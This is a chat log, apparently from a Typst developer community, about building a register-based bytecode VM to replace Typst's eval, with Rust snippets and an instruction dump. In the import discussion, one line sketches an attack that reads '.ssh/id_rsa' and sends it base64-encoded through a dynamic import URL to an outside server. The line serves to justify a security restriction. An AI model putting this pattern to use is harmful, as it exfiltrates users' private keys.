#Performance
I'd love to
As said, it's just a rough draft and the ideas are also far from final. I'm also not yet really 100% sold on the custom vtable thing, but it would definitely unlock some cool stuff.
Very nice read as well!
I'm wondering, is it always the best option to use span for memoization? or could we do that more subtly when needed for reasons?
I mean, what other information do we have access to at that stage?
Wouldn't Arc<(Hash, RestOfData)> already store the hash alongside the refcounts?
Call me foolish, but It's All Just One Instruction Anyway™, no?
Yeah, right. I was thinking of the other possible optimization where the header is in front of the pointer.
Perhaps, it doesn't make a real difference.
@left night I kinda want to work on the whole "bytecode" thing, would you be open to that?
I am definitely open to that. I also think that it would be a fun greenfield project with lots of stuff to experiment with.
greenfield?
I don't know what that means
it's obviously not completely free from existing constraints, but it involves building lots of new free-standing stuff
Yes, I think I'll start with a fairly basic system that doesn't do any kind of smart checking (like validating args beforehand) to try and make it simpler, then grow the complexity (and performance) as I go along
what is the bytecode in typst?
it would replace eval with a new pre-compiled bytecode that would hopefully be much faster to evaluate as well as be more memoizable (by not having any spans and things like that)
So there is no bytecode in typst, and you want to make one.
yes
so this would only apply to any code that is evaluated with eval or all Typst code?
all typst code
eval in this case refers to the module inside of the typst source
I was looking at the parallel test branch, but it has not been merged yet. https://github.com/typst/typst/commit/e0adfc1ded3dedde5f450eb1f0d0dd3cb37cd768
Some tests fail, but I don't know what those failures mean. Could they be fixed with some simple patches? What is missing that causes the failures? I have no idea.
There is some stuff regarding introspection that just doesn't work yet on that branch 😦
@left night do you know where values are collected? Like joined into one big value for returning 🤨
Ah, I found it sorry for the ping
So if my understanding is correct, typst code is currently interpreted by basically walking through the tree, and you want to do something like in Python, where it's first compiled to bytecode and then the bytecode gets run instead?
yes, because as it turns out, eval is rather slow and happens very often
I seee
The goal being to make eval blazing fast and easier to understand (hopefully)
Sounds like a huge undertaking tho haha
Actually: not that much
Would you generate your own bytecode language or are there libraries for that
Or how exactly
Because I just need to traverse the tree and generate OpCodes instead
And then eval the opcodes which is fairly simple
Icic
At present it can already do basic operations
Well keep us posted
mind you I am not compiling to bytecode yet
My goal is eventually to add (primitive) type checking in it (once we have type validation) and check whether variables, functions, etc. exist
Parallel layout requires a change to how locations are assigned, which breaks measurement. More details and a possible solution in my recent blog post: https://laurmaedje.github.io/posts/frozen-state/
Later on we might even be able to optimize the bytecode during eval, but that's wayyyyyy out of scope for my early prototype
@sturdy sequoia This is more fun than dealing with subtle bugs in the styling system, eh?
yes
The thing is that I don't understand all of the complexity of the styling system so I feel a bit dumb lmao
it might be a good idea to do a register based interpreter instead, while you are already rewriting the interpreter
that should increase the performance over a stack based vm
I must admit I am doing it stack based because it's easier and makes joining output easy: I just join the stack once I'm done
That's literally how I'm handling producing the output and joining of values
and it's dead easy
I'll probably remove the Variable stack value mind you
I guess for joining with a register based vm, we would simply need a join instruction: JOIN accumulator, return_register
yes probably
how would you handle name and spread arguments tho?
My idea currently is that calling a function looks like this: Call(function_id, arg_count) and then I pop arg_count arguments and if they are NamedArgument or SpreadArgument I apply the proper behaviour
would you essentially do the same?
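To make the Call(function_id, arg_count) idea concrete, here is a rough sketch of popping arg_count values off the stack and sorting them into positional and named arguments. Everything in it (StackValue, CallArgs, collect_args, plain integers as values) is made up for illustration and is not taken from the prototype.

```rust
/// Hypothetical stack entries; the real prototype works on Typst values.
#[derive(Debug, Clone, PartialEq)]
enum StackValue {
    /// A plain positional value.
    Int(i64),
    /// A `name: value` argument.
    Named(String, i64),
    /// A `..args` argument that was already evaluated to a list.
    Spread(Vec<i64>),
}

/// The arguments handed to the callee.
#[derive(Debug, Default, PartialEq)]
struct CallArgs {
    positional: Vec<i64>,
    named: Vec<(String, i64)>,
}

/// Pops `arg_count` values off the stack and sorts them by kind.
/// Returns `None` if the stack holds fewer values than requested.
fn collect_args(stack: &mut Vec<StackValue>, arg_count: usize) -> Option<CallArgs> {
    if stack.len() < arg_count {
        return None;
    }
    let start = stack.len() - arg_count;
    let mut args = CallArgs::default();
    // `drain` keeps the left-to-right order of the call site.
    for value in stack.drain(start..) {
        match value {
            StackValue::Int(v) => args.positional.push(v),
            StackValue::Named(name, v) => args.named.push((name, v)),
            StackValue::Spread(items) => args.positional.extend(items),
        }
    }
    Some(args)
}
```

The catch is that the named/spread distinction is only discovered at run time, which is the cost the register-based suggestions further down try to avoid.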
I'm just not sure I want to deal with the complexity of register based VM
because (I think) it'll make the compilation much harder
great resource, thanks!
Hmmm, I see how that leads to a smaller eval indeed
It also has the advantage that we don't need to allocate like ever
Famous last words
I said the same thing for gradients didn't I?

You did xD
How are you hoping to achieve the big fast with such high-level abstractions
We need function signatures to simply not exist at evaltime
Oh god that means we will have two entirely distinct compilation passes
terminology is gonna aa
What font are you using?
comic code
Yes, function calls would still be a bit slow, but better than the current technique
I am now looking into the register-based system that @cunning wadi suggested and I wonder if I can use that to make it faster
But obviously, I will need to do a lot of testing and benchmarking to make it work
It can really be reduced to
- resolve all arguments against the function's signature
- compile down to 1 register per argument according to the function's signature, not the call site
- give function access to those registers
master race
yes but the problem is named and optional arguments
it's a bit tricky for those
mmnope
named: not any different, just have some canonical ordering
optional: optional is a call site privilege, simply substitute the value in the bytecode
though dynamic dispatch is harder.
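A sketch of what "resolve against the signature at compile time" could look like, assuming the callee is known statically. Param, Slot and resolve_call are hypothetical names, and the rule "a parameter with a default is named, one without is positional" is a simplification for the example, not Typst's actual signature model.

```rust
/// Hypothetical parameter description; not Typst's real signature type.
struct Param {
    name: &'static str,
    /// Constant used when the call site omits the argument.
    /// In this sketch, `Some` also marks the parameter as named.
    default: Option<i64>,
}

/// What the compiler would emit for one parameter slot.
#[derive(Debug, PartialEq)]
enum Slot {
    /// The argument lives in this call-site register.
    FromRegister(u16),
    /// The call site omitted it, so the default is baked into the bytecode.
    Default(i64),
}

/// Maps call-site arguments onto one slot per parameter, in signature order.
fn resolve_call(
    params: &[Param],
    positional: &[u16],
    named: &[(&str, u16)],
) -> Result<Vec<Slot>, String> {
    let mut next_positional = positional.iter();
    params
        .iter()
        .map(|param| match param.default {
            // Named parameter: look it up by name, else substitute the default.
            Some(default) => Ok(named
                .iter()
                .find(|(name, _)| *name == param.name)
                .map(|(_, reg)| Slot::FromRegister(*reg))
                .unwrap_or(Slot::Default(default))),
            // Positional parameter: take the next positional argument.
            None => next_positional
                .next()
                .map(|reg| Slot::FromRegister(*reg))
                .ok_or_else(|| format!("missing argument: {}", param.name)),
        })
        .collect()
}
```

With this, the callee always sees one register per parameter in canonical order, no matter how the call site spelled its arguments. It does not cover dynamic dispatch, where the signature is unknown until run time.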
@glossy shore my current design is as follows:
- The compiler builds a list of instructions (for which each has a span in a second array)
- The compiler also builds a list of constants (to avoid cloning and keep instructions copy)
- And a list of jump labels
- Then an Executor is created which is very lightweight, containing a fixed-size array of registers (initially all Value::None)
- It executes each instruction one-by-one, borrowing as much as possible (to avoid cloning)
My instruction set is around 23 instructions so far
I'm definitely missing some, for example you cannot build a dict or array at the moment, but I'll add that
Cannot do show-set rules either
But I'll work on that now
bytecode will be the road to jit 🤩
Each instruction is only 8 bytes which imo is perfectly fine
yesssss
yes. i also worry about that. jit/bytecode the "pure-compute" part is much easier
I still think that for now I'll handle arguments and variables as special values that are accessed with an ID
my goal is to turn them into instructions that are similar to function calls but have specific semantics
we'll see how that ends up working!
the hardest part will be building the compiler itself I think
Could this also make browser-side layout possible? If we can ship the bytecode, we could lay out and produce frames by executing the bytecode dynamically in the browser, without having to download the entire 17 MB compiler.wasm to the client.
If the bytecode could be lowered to wasm, we could even use the browser's native wasm interpreter.
To lower the bytecode to wasm, it would need to operate on a very low-level basis. I think the planned implementation would continue using all of Typst's data structure and runtime infrastructure, meaning that layout is separate from it.
yes indeed, my goal is to make it easy-ish to turn set show labels, etc. into function calls but JIT is still wayy out of scope
We don't have to convert out a wasm in early stage.
My goal is a nice performance bump for now
Do you think it's a good idea to do the following:
- Recursive descent in the tree: each node gets compiled to an instruction, using a register counter that keeps increasing every time we need one
- Do a second pass once we have collected all of the instructions deduplicating them: essentially once a register is no longer used, mark it as "free" and give the next instruction that needs a register access to it
That's essentially a first recursive pass, followed by a second linear pass
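Here is a small sketch of what the second, linear pass could look like. It assumes a simplified instruction shape (Instr with a list of read registers and an optional written register) and assumes every register is written before it is read; remap and its details are illustrative, not the prototype's code.

```rust
use std::collections::HashMap;

/// Simplified instruction: reads some registers, optionally writes one.
#[derive(Debug, Clone, PartialEq)]
struct Instr {
    reads: Vec<u32>,
    write: Option<u32>,
}

/// Rewrites ever-increasing virtual registers to a small reusable set.
/// Returns the remapped instructions and the number of registers needed.
/// Assumes every register is written before it is read.
fn remap(instrs: &[Instr]) -> (Vec<Instr>, u32) {
    // Index of the last instruction that mentions each virtual register.
    let mut last_use: HashMap<u32, usize> = HashMap::new();
    for (i, instr) in instrs.iter().enumerate() {
        for &r in instr.reads.iter().chain(instr.write.iter()) {
            last_use.insert(r, i);
        }
    }

    let mut mapping: HashMap<u32, u32> = HashMap::new();
    let mut free: Vec<u32> = Vec::new();
    let mut count: u32 = 0;
    let mut out = Vec::with_capacity(instrs.len());

    for (i, instr) in instrs.iter().enumerate() {
        let reads: Vec<u32> = instr.reads.iter().map(|r| mapping[r]).collect();
        // A register read for the last time here is marked as free, so it
        // can already serve as the target of this very instruction.
        for r in &instr.reads {
            if last_use[r] == i {
                if let Some(reg) = mapping.remove(r) {
                    free.push(reg);
                }
            }
        }
        let write = match instr.write {
            Some(v) => {
                let reg = match mapping.get(&v).copied() {
                    Some(reg) => reg,
                    None => {
                        // Prefer a freed register, else allocate a new one.
                        let reg = match free.pop() {
                            Some(reg) => reg,
                            None => {
                                count += 1;
                                count - 1
                            }
                        };
                        mapping.insert(v, reg);
                        reg
                    }
                };
                Some(reg)
            }
            None => None,
        };
        out.push(Instr { reads, write });
    }
    (out, count)
}
```

In this sketch a register that is written but never read stays allocated; a real pass would probably drop such dead writes first.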
note that currently locals are stored in a special local store and not in registers, same with arguments. Therefore only values that are not bound are ever stored in registers
@left night do assignments return a value in typst?
i believe they return None
Yes, so in my case they won't return anything
wdym?
well in my case, an assignment is just a single instruction
it won't store anything in any register
because where it's used will automatically and always be a none
yea but what if the function only has an assignment?
it will apply it and return None automatically
and what if the assignment is used in an expression?
it'll be None automatically
well no, the operator doesn't, it will just get automatically set to a None
Basically, register 0 is always a None
That way
well, if you ensure it behaves exactly as it does now, then i dont see a problem
Join 0 1 1
is easy to detect
My goal is to be able to remove useless assignments
And useless ops that use a none
Not to criticise your work, but if CPUs can work with 4bytes max isn't that a lot?
That can just be the case whenever you can predict the value of an expression beforehand
Register re-mapping is implemented
now I just need to finish implementing the VM
and it should work?
how long do you think it'll take?
I honestly think it'll be faster than one might expect
I ended up being able to re-use a lot of the existing infrastructure so it's not too bad
What I mostly need to do is implement the VM, and optimize everything with IDs (which is already mostly the case, I just need to do it for scopes)
The one big thing missing right now is that you can't do any kind of scopes, there is only one scope: the global scope
However once I'm done, it'll be okay I think
I'm afraid it'll be zero lol
One of the big changes mind you is also that I'm turning it from a clone fest to a borrow fest
which should help reduce cloning a TON
And it should be able to memoize compilation much more aggressively
How so? :(
I meant I am scared that it might be no gains
I don't know yet
I'm kind of stuck on closures
Maybe it'll be worse
Now that's just mean
The main advantage is that it should cache much better, less instructions, etc.
I hope so too
it's a lot of work
and it's nowhere near merge-quality code yet
You know I'd love to review help and document right?
Best meme of the year
pub struct CompiledClosure {
    /// The span of the closure.
    span: Span,
    /// The instructions that make up the closure.
    instructions: Vec<Instruction>,
    /// The spans of the instructions.
    spans: Vec<Span>,
    /// The captured variables.
    captures: Vec<Capture>,
    /// The default values of the named parameters.
    /// To be loaded into the closure's scope.
    defaults: Vec<Register>,
    /// The number of local variables.
    locals: usize,
    /// The constants of the closure.
    constants: Vec<Value>,
    /// The strings of the closure.
    strings: Vec<String>,
    /// The patterns of the closure.
    patterns: Vec<Pattern>,
    /// The closures of the closure.
    closures: Vec<CompiledClosure>,
}
Now that's freaking fat
Thicc
About half of the instructions are implemented
If you improve the performance of the typst language, will that improve the performance of the compilation of documents?
massively yes
Is eval a big bottleneck?
not really. for oi-wiki, most eval time used is for wasm plugin: generating qrcode. and eval takes about 20%-30%
for smaller docs things may become different
also might be different for docs which make heavy use of scripting
but bytecode and jit is very very cool. i really want to see how it looks like
like tablex or cetz? maybe in these doc, eval takes a lot of time
I think a more nuanced answer than @onyx furnace's is:
it depends
If you use libraries like tablex or codly, have complex templates, or do any sort of compute? yes
oi-wiki is really special because it's bottlenecked by the wasmi runtime
but most docs I have seen (so far) did have quite a bit of compute and decreasing our reliance on this will definitely help
Will it 10x typst's perfs? no
Will it 2x them? maybe, depends on the document
Is anything that doesn't 10x performance even worth doing?
Clearly not
Handwritten assembly or riot
... it kind of is
it's indeed a hand-written assembly
(well a decent chunk was written by ChatGPT)
Inline assembly in rust?
no, but it's an assembly
and I wrote it by hand
so it's hand written assembly
Thank you for your answers!
Ok, so the compiler mostly works. The following code:
= Hello, world!
This is a more complex example.
#lorem(300)
Gets compiled to the following instructions:
consts: [ Space, Text("Hello, World!"), Text("This is a more complex example."), Parbreak, 300]
isrs: [
Set { register: Register(1), value: ConstId(0) },
Join { lhs: Register(0), rhs: Register(1), target: Register(0) },
Set { register: Register(2), value: ConstId(1) },
Join { lhs: Register(3), rhs: Register(2), target: Register(3) },
Heading { span: Span(1), level: 1, body: Register(3), target: Register(4) },
Join { lhs: Register(0), rhs: Register(4), target: Register(0) },
Set { register: Register(5), value: ConstId(0) },
Join { lhs: Register(0), rhs: Register(5), target: Register(0) },
Set { register: Register(6), value: ConstId(2) },
Join { lhs: Register(0), rhs: Register(6), target: Register(0) },
Set { register: Register(7), value: ConstId(3) },
Join { lhs: Register(0), rhs: Register(7), target: Register(0) },
LoadModule { module: ModuleId(0), local: LocalId(58), target: Register(8) },
Args { target: Register(9) },
Set { register: Register(10), value: ConstId(4) },
ArgsPush { args: Register(9), value: Register(10) },
Call { callee: Register(8), args: Register(9), target: Register(11), math: false, trailing_comma: false },
Join { lhs: Register(0), rhs: Register(11), target: Register(0) },
Set { register: Register(12), value: ConstId(0) },
Join { lhs: Register(0), rhs: Register(12), target: Register(0) }
]
What do y'all think?
(especially @left night @onyx furnace @tight glade @glossy shore and others that were interested like @sly pecan)
As you can see all names, etc. are completely removed instead using indices to try and make accesses much faster
Is control flow already supported?
It's funny to me that you think I would understand anything of this
The only things that are currently not supported:
- Show/Set rules
- Importing/Including modules
- Scoping, it currently only supports scoping for closures/functions but not blocks of code/content
Otherwise pretty much everything is implemented
show set rules I plan on supporting using a rule stack that changes the behaviour of the Join instruction because it's the easiest
And scoping is more about me being lazy
how many registers do we have?
Currently 32, but I don't know how many we really need
you are surprisingly fast!
does the number of regs matter? I don't know much about bytecode design, but it feels like there is no 1:1 mapping between logical regs and physical ones
And I think we also have a memory?(If we use up all the regs)
I mean yes because it's how much stack size and memory it will use
But apart from that, not really
I think they all are in memory. And we may not have to bind them to physical registers in initial impl.
It's unlikely we could because there's quite a bit of state in the VM atm in addition to the register themselves
the instructions are quite high level in order to reuse as much as possible
Would it be better if we had exactly 0 regs and relied only on a stack? We could do clever reg allocation later, once we want to JIT/compile to native code.
pub struct Executor<'a> {
    /// The instructions to execute.
    instructions: &'a [Instruction],
    /// The spans in the instruction set.
    spans: &'a [Span],
    /// The labels in the instruction set.
    labels: &'a [usize],
    /// The constants in the instruction set.
    constants: &'a [Value],
    /// The closures in the instruction set.
    closures: &'a [CompiledClosure],
    /// The strings in the instruction set.
    strings: &'a [EcoString],
    /// The scopes used in the instruction set.
    scopes: Scopes<'a>,
    /// The locals used in the instruction set.
    locals: Vec<Value>,
    /// The captured locals used in the instruction set.
    captured: &'a [Value],
    /// The arguments used in the instruction set.
    arguments: &'a [Value],
    /// The current register table.
    registers: RegisterTable,
}
#[derive(Clone, Debug, PartialEq, Hash, Default)]
pub struct RegisterTable {
    pub registers: [Value; REGISTER_COUNT as usize],
}
The idea of having registers instead of a stack is that it leads to fewer instructions and (hopefully) faster execution
Additionally, it makes the compiler insanely easy to write
sounds like cisc vs risc
oh, it's a CISC
Some instructions run a TON of code behind the scene lol
HISC
Especially closure initialization
humongous instruction set computer
there's only around 50 instructions
But each instruction is 32 bytes
We may simply have infinite registers, and determine it then by the thesis.
I think 32 should be fine
maybe 64 but no more
note that currently locals are not stored in registers (which I admit is a bit weird)
My plan is to convert locals to registers soon™
But I'd like the whole thing to work and be debugged first
Letting instructions use infinite registers benefits static analysis. I don't know whether it introduces overhead in the bytecode compiler.
to the compiler: no
currently the compiler actually uses infinite registers, then does a second pass to reuse registers and optimize
My goal with this is mostly to avoid using too much memory and to avoid allocating
but we could definitely do this without putting a hard cap on the number of registers
Sounds good
Like optimizing without limiting to 32 registers
My goal is also (maybe) to have multiple sizes of register pages and depending on the function use a bigger or smaller one among multiple sizes
to try and be as cache and memory efficient as possible
We may also have comemo on executing blocks.
And using Defer<T> to send a sufficient big instructions batch to another thread to execute...
Like we could start by allocating 32 registers but grow as needed! I can take a deeper look this evening, where can I take a look at the implementation? ❤️
I haven't pushed it yet :-p
that's my plan indeed
Many crazy optimization..
By the thesis is my new expression ❤️
Wait, are you going to write bytecode manually in source code? Or what is as needed in this sentence.
😦
I want to see that now lol
The bytecode is being written manually by dherse now in typst code base yea
But typst users will never see it
@untold turret @onyx furnace I actually really like the idea of having a variable number of registers, because it also removes the need to distinguish between: locals, captured, and arguments as being "special" cases which simplifies everything
So I think that as soon as it all works, I'll be implementing it that way
If we don't target to utilize physical registers in "part 1", I think it is a really good decision. But I heard you had restricted it, so I thought the limiting registers is easy.
it's easy to limit them because a lot of values are not in registers but in special storages (like local variables, arguments, and captured values)
but if all of those need to be in registers, it makes the compilation much harder
because you'll need to reorder things just to make room
or have a stack
Would it make sense to compile content blocks to a special template instruction rather than a lot of set + join? That way we can allocate space for the sequence beforehand and have less overhead in joining and Arc::get_mut.
that's exactly what I am changing to
I was already doing it because handling styles was basically impossible
The way it works is as follows:
- Each markup, block, etc. creates a join group, when in a join group, the Join instruction basically appends the value to the group (which is pre-allocated to a size close enough to the output)
- When a markup, block, etc. ends, it pops the join group saving it to a register (as one big content)
- Whenever a style rule is encountered, it does the same but pushes it into a StyledElem instead (so a special kind of join group).
If a join group is empty, it just produces an empty sequence elem, etc.
My idea is that we can therefore pre-allocate a lot, and then we can just build the sequence from the arrays (EcoVec) directly
Additionally, I have some smart handling for subsequent show and set rules, where they get collected into a single Styles to try and save memory and decrease the depth of the final Content tree
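The join-group mechanism described above can be sketched in a few lines. This assumes a toy Content type and a hypothetical Joiner holding one Vec per open group; the real VM works on Typst values and EcoVec, and styles would be a second kind of group that this sketch leaves out.

```rust
/// Hypothetical stand-in for Typst content.
#[derive(Debug, Clone, PartialEq)]
enum Content {
    Text(String),
    Sequence(Vec<Content>),
}

/// Stack of join groups, one per open markup or code block.
#[derive(Default)]
struct Joiner {
    groups: Vec<Vec<Content>>,
}

impl Joiner {
    /// Opens a group, pre-allocating room for roughly `capacity` children.
    fn push_group(&mut self, capacity: usize) {
        self.groups.push(Vec::with_capacity(capacity));
    }

    /// Appends a value to the innermost open group.
    fn join(&mut self, value: Content) {
        self.groups
            .last_mut()
            .expect("no open join group")
            .push(value);
    }

    /// Closes the innermost group and returns it as one piece of content.
    /// An empty group yields an empty sequence.
    fn pop_group(&mut self) -> Content {
        let items = self.groups.pop().expect("no open join group");
        Content::Sequence(items)
    }
}
```

Nested blocks fall out naturally: the inner group is popped into a value, and that value is joined into the outer group like any other.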
I plan on writing a LOT of docs in the module to explain how it all works, as well as I have commented basically every line of the compiler
Because the VM is actually quite complex, but this complexity is really aimed at improving performance
I also need to make the compiler use TrackedMut<Compiler> that way I can just #[comemo::memoize] each block
Do you mean each individual [..] and {..} block?
Not sure yet, but maybe
I might just have two functions one which isn't memoized and based on the size then decide which one to take
When a block has a lot of assignments, the mutable constraints will probably tank performance. If it's mostly pure, it could be okay.
Actually, I am not handling remote assignment and mutable methods yet
Because it sounds... hard
What's remote assignment?
remote assignments = assignments in a parent scope
ah
Overall, I think caching less and smarter (not even every function call) might be more the way to go. Less hashing, lookup, constraint, and memory overhead
No, that would be impure
Thank you
'cause I was worried
Then mutable assignments should be relatively easy
Just need a Scopes::enter and Scopes::exit call and then it's good
did it grow from 8 bytes to 32 bytes?
I wonder why we have to load a module as a value? Couldn't that stay outside of runtime
perhaps, it'd be worthwhile to do more struct-of-arrays? a Vec<u8> with opcodes and then one supplemental maybe Vec<u32> for common index arguments and then something for rarer arguments. but it starts complicating things more.
By the way, I suspect import "..": * is gonna be a pain to implement
Right now the imported string can even be dynamic, but I'm thinking about forbidding that. For import, I think almost nobody uses it, but for include some people do. Not sure.
It's also a security concern should we allow some sort of URL imports: #1176122103355953162 message
And exactly how comemo-able is this bytecode?
cache locality will significantly improve then
Shouldn't all scoping just be resolved at comptime
That's only possible if the ".." is known then
I think given the different constraints we're under this would make sense, it's not like registers have any real advantage over stack / heap for us
I think int registers, string registers, array registers etc. could definitely be useful
we could also allocate it all at once beforehand
yes, because some instructions contain a span, but it's useless so I plan on removing it
Indeed, I don't know yet how to do it
I am thinking of compiling and evaluating on-the-fly and cross my fingers that it's enough
the bytecode is copy, it only contains numbers (pretty much)
ah right, that's indeed an issue, I might just forbid it for the time being
for include it's fine because I can just evaluate it at runtime (relying on comemo for fast compilation)
but letting import be dynamic is a big no-no
But like the execution of it
as its linear
I think that it makes sense to allow things like git repos and stuff like that, but my problem is more that packages might use it, and that's an even bigger no-no
but even if you allow a git repo, the URL should be static
my problem is that if the URL is dynamic (even if it's a git URL), you can exfiltrate arbitrary data via the URL
what exactly is the attack vector here?
let's assume typst is executed in your home dir, so the whole home dir becomes part of the project. Then you let id = read(".ssh/id_rsa"), and call import "my.git.server/" + base64(id).
The whole read ssh keys, embed them into the PDF in some invisible way and get the person to send you the PDF is imo not that big of a deal. but this here would be a pretty big attack surface imo.
Ok, I reduced instructions to 16 bytes
that's true
I still think it's a genuine attack vector and it makes me glad that we have proper path sanitization
But indeed, leaking stuff through URLs would be 100x worse
I brought it down to 12 bytes
and that's bigger than I'd like
but it's pretty good
what do you think of SOA for instructions (struct of arrays)?
I'm not too sure what you mean by that
I meant to ask for clarifications but then I forgot
like just having an array of u8 and decoding instructions on the fly?
yes I know, but I don't understand in the context of instructions
Ok, I found the culprit and it's now down to 8 bytes
That means that each cache line can contain 8 instructions, I'd argue that's about as good as it gets
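For anyone wondering how the size can be kept in check: a sketch with a made-up subset of instructions whose operands are all 16-bit indices, plus a compile-time size check. Register, ConstId and the variants are illustrative stand-ins, and the 64-byte cache line is an assumption (typical on current x86-64 hardware, not universal).

```rust
use std::mem::size_of;

/// Hypothetical operand types: small indices instead of names or values.
#[derive(Clone, Copy, Debug)]
struct Register(u16);

#[derive(Clone, Copy, Debug)]
struct ConstId(u16);

/// A made-up subset of an instruction set; every operand is a 16-bit index,
/// so the widest variant holds three of them plus the enum tag.
#[derive(Clone, Copy, Debug)]
enum Instruction {
    Set { register: Register, value: ConstId },
    Join { value: Register },
    Add { lhs: Register, rhs: Register, target: Register },
    JumpIf { condition: Register, label: u16 },
}

// Compilation fails if a new operand pushes the size past 8 bytes.
const _: () = assert!(size_of::<Instruction>() <= 8);

/// Assumed cache line size in bytes.
const CACHE_LINE: usize = 64;

/// How many instructions fit into one (assumed) cache line.
fn instructions_per_cache_line() -> usize {
    CACHE_LINE / size_of::<Instruction>()
}
```

A check like this would flag a regression such as a stray Span inside a variant at compile time instead of showing up later in a profile.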
In the context of instructions, I meant that opcodes are a separate array from arg1, from arg2 etc.
Since not every instruction has the same structure, it would require some cleverness
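A rough sketch of the struct-of-arrays idea, assuming every opcode has a fixed number of u16 operands so that the decoder knows how far to advance. Op, Program and the operand counts are invented for the example, and rarer or wider arguments would need a third array that is not shown.

```rust
/// Hypothetical opcodes, each with a fixed number of `u16` operands.
#[derive(Clone, Copy, Debug, PartialEq)]
#[repr(u8)]
enum Op {
    Set = 0,
    Join = 1,
    Add = 2,
}

impl Op {
    /// Number of operands this opcode consumes from the operand array.
    fn operand_count(self) -> usize {
        match self {
            Op::Set => 2,
            Op::Join => 1,
            Op::Add => 3,
        }
    }

    fn from_byte(byte: u8) -> Option<Op> {
        match byte {
            0 => Some(Op::Set),
            1 => Some(Op::Join),
            2 => Some(Op::Add),
            _ => None,
        }
    }
}

/// Opcodes and operands live in separate, densely packed arrays.
#[derive(Default)]
struct Program {
    opcodes: Vec<u8>,
    operands: Vec<u16>,
}

impl Program {
    fn push(&mut self, op: Op, operands: &[u16]) {
        assert_eq!(operands.len(), op.operand_count());
        self.opcodes.push(op as u8);
        self.operands.extend_from_slice(operands);
    }

    /// Walks both arrays in lockstep, decoding instructions on the fly.
    fn decode(&self) -> Vec<(Op, &[u16])> {
        let mut cursor = 0;
        let mut out = Vec::with_capacity(self.opcodes.len());
        for &byte in &self.opcodes {
            let op = Op::from_byte(byte).expect("invalid opcode");
            let end = cursor + op.operand_count();
            out.push((op, &self.operands[cursor..end]));
            cursor = end;
        }
        out
    }
}
```

The trade-off is that operand offsets are only known by decoding in order, so jump targets would have to store both an opcode index and an operand offset.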
But 8 bytes is pretty good
I think so too
I kind of want to keep it reasonably simple for when I have to debug it
BTW @left night how can I chain two Styles
As in, I already have a style and I want to add one more
(some cleverness to avoid nested StyledElem)
@atomic violet isn't this stuff more like your speed?
content.styled(..) will do this flattening automatically. it is based on Styles::apply.
I mean I do care for one reason: that's the only place where I'm allocating in the vm
And I want to keep allocations to the bare minimum if I can avoid it
But of course we can revisit it once it actually works
Only things missing now are import, include and a few instructions like the ability to store in remote contexts, and the ability to run iterators (for x in y)
for which the instructions are there, they're just not implemented
Amazing. At least someone is dedicating their weekend to typst. A hero amongst mortals.
Oh, and destructuring values is not yet implemented either!
I retract my praise then.
It might be, but I haven't dug into typst deep enough to contribute anything at the moment
That's probably equivalent to elegantly changing the meaning of a few Registers
Which is hella cute
I have done it like this:
destructuring takes a pattern, the pattern indicates in which locals to store values
pretty rudimentary atm
If the values are already stored somewhere we can just change which register is pointing to it right?
ackshually, I have a question, what does Join do?
it joins values into a bigger value
it's the joining mechanism in typst
like joining multiple pieces of content into one big content
I guessed that much, but what does it do in the inside? Like create a tree node, or push to a vector of things to join, or ...?
push to a vector of things
but it has the concept of a context, which is a vector of vectors to handle nested joining
why is its signature so weird then? shouldn't it only have "where to push" and "what to push" arguments? Like lhs += rhs instead of target = lhs + rhs?
yes, before it didn't have that feature
now it would just be Push(capacity), Join(what_to_add), Pop(where_to_store)
/// Push a new join group
JoinGroup {
    /// The capacity hint of the join group.
    capacity: u16,
},
/// Pop a join group
PopGroup {
    /// The register in which to store the result.
    target: Register,
},
/// Join two values.
Join {
    /// The value to add to the join group.
    value: Register,
},
ah, i see, that makes more sense
yes, styles are also just special join groups that carry a style
styles = show and set rules
I've tried to make things fairly simple and clever
but there ends up being quite a few moving parts
But I think it's okay
Because I'm trying to reuse as much of the existing logic as possible, most notably all of the ops::... like ops::add(rhs, lhs) that already exist in the code base
@left night do we want to keep this feature:
if let Some(sink_name) = sink_name {
    if let Some(sink_pos_values) = sink_pos_values {
        remaining_args.items.extend(sink_pos_values);
    }
    vm.define(sink_name, remaining_args);
}
If a sink is unnamed, the other arguments get defined as variables in the scope
This feels very error prone?
And is basically completely incompatible with my design 😦
yes, but is this feature useful in any way outside of that bug?
uh
well
the idea is that you should be able to take any args without caring about them
that's all
For now I'll just treat .. as "discard everything else"
yes figures, because it defines the variables which is super weird
what's the issue?
only if it's named though
ah no
okay
my bad
I had misunderstood the code, it was a bit confusing with the if let Some(..) = .. everywhere
ok, so it's the right way
but yeah you can just throw it all away
Sorry to say, but...
it's...
kind of the point
throwing all of the eval code into a volcano

Question: when we want to change the evaluation, will we have to work with your new bytecode already or is there some level of abstraction?
Like, is the eval trait still a thing? Does it return bytecode now?
Now there is the Compile trait which receives the &mut Compiler as an argument, it must produce all of the instructions (with spans) in there (I will make a nicer functional API once it all works) and return a SourceResult<Register> the Register being where the output of that operation is stored.
Note that the output may very well be Register::NONE in which case it means it returns nothing
As an example:
impl Compile for ast::MathPrimes<'_> {
    fn compile(&self, compiler: &mut Compiler) -> SourceResult<Register> {
        let value = compiler.const_(
            PrimesElem::new(self.count()).pack().spanned(self.span()).into_value(),
        );
        let register = compiler.reg();
        compiler.spans.push(self.span());
        compiler.instructions.push(Instruction::Set { value, register });
        Ok(register)
    }
}
Here is how ' in an equation gets compiled
later on, I plan on replacing the manual span and instruction push with:
compiler.set(self.span(), value, register);
Which I think will be much nicer
Same with removing the .into_value() by making const_ take an impl IntoValue instead
Which would lead to:
impl Compile for ast::MathPrimes<'_> {
    fn compile(&self, compiler: &mut Compiler) -> SourceResult<Register> {
        let value = compiler.const_(
            PrimesElem::new(self.count()).pack().spanned(self.span()),
        );
        let register = compiler.reg();
        compiler.set(self.span(), value, register);
        Ok(register)
    }
}
Obviously some stuff like loops are much harder to do, but I plan on creating a nice-ish API for branching as well
Now here are the updated items missing:
- Destructuring (the instruction exists but is not implemented)
- Iteration (the instruction exists but is not implemented)
- Import and include of other files
This means that I should be able to start compiling simple docs!!!!
IT WORKS BABYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
I AM SO FREAKING GOOD
GODDAMN
@left night 
now do your thesis
can't yet
missing modules and closures don't work for some reason
skill issue
There's still Sunday.
It's just so absurd to have a jit for a typesetting language. I just can't fathom this.
Not a jit but whatever this is.
it's not a JIT, it's a bytecode based VM
if you think of typst more as a jupyter alternative where you can build your visualizations (graphs, etc.) directly in, then I think it makes perfect sense
But tomorrow I won't have time to work on it
and it'll likely have to wait until next w-e
Another blanket shall be delivered. Good work!
a jit would be fun though
and maybe even doable with cranelift as a pure rust dependency
lovely!
nice
